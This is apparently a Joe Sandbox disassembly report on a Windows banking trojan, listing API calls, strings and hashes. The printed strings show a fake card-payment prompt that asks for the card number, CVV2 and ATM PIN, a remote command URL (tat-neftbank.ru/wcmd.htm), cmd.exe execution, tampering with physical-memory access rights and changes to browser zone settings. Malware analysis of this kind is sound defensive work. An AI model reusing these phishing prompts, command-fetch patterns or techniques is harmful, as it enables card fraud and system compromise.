                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • BrowseNewProcess, xrefs: 00405113
                            • 1601, xrefs: 004050D4
                            • yes, xrefs: 0040510E
                            • GlobalUserOffline, xrefs: 004050FA
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
